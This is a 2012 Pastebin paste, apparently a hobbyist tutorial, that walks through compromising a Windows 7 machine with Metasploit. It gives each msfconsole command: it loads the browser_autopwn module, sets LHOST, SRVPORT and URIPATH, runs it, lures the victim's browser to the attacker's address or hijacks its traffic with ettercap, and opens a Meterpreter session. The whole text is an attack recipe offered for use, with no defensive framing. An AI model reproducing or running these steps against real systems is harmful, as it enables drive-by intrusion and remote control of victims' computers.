HackerRIZLA

Hacking Windows 7 with Metasploit.

Sep 16th, 2012
276
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
  1. Hack Windows 7 In 2 minutes
  2. ==
  3. What You Need To Do ANd What you Want to do?
  4.  
  5. 1.Backtrack
  6. 2.Windows 7 machine
  7. 3.Installed Browser eg.chrome,IE,Firefox or any
  8.  
  9.  
  10. So Let's Start
  11. 1.Start Backtrack
  12. 2.Type "Startx" To enter GUI mode of Backtrack.
  13. 3.Go To terminal
  14. 4.Type "msfconsole"
  15.  
  16. In slave Machine
  17. 1.Start the slave Machine
  18.  
  19. Back to Backtrack
  20. 5. Type msf:>use auxiliary/server/browser_autopwn
  21.  
  22. 6.Thentype msf :>show Options
  23. Set LHOST means Localhost ip address To check Localhost ip Go to terminal And type "ifconfig"
  24. 7. msf:>set LHOST eg.192.168.168.1
  25. After That you want set SRVPORT which is 80 or 8080
  26. 8.msf:>set SRVPORT 80
  27. Then set URIPATH eg.root "/"
  28. 9.msf:>set URIPATH /
  29.  
  30. Now Everything Is done
  31. 10.msf:>exploit or run
  32.  
  33.  
  34. Now What to need To to open On slave Machine
  35. 2.Open Any Browser Type Your BAcktrack Machine's ip address
  36. eg.http://192.168.168.1/
  37. If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open http://www.google.com it can also hacked.
  38. Next time i can diffidently give tut on ettercap.
  39.  
  40. After A minute you Can see our Session Is open
  41.  
  42.  
  43. To open a Meterprete
  44.  
  45. type
  46. msf:>sessions -i 1
  47.  
  48. And you are ready :)
Add Comment
Please, Sign In to add comment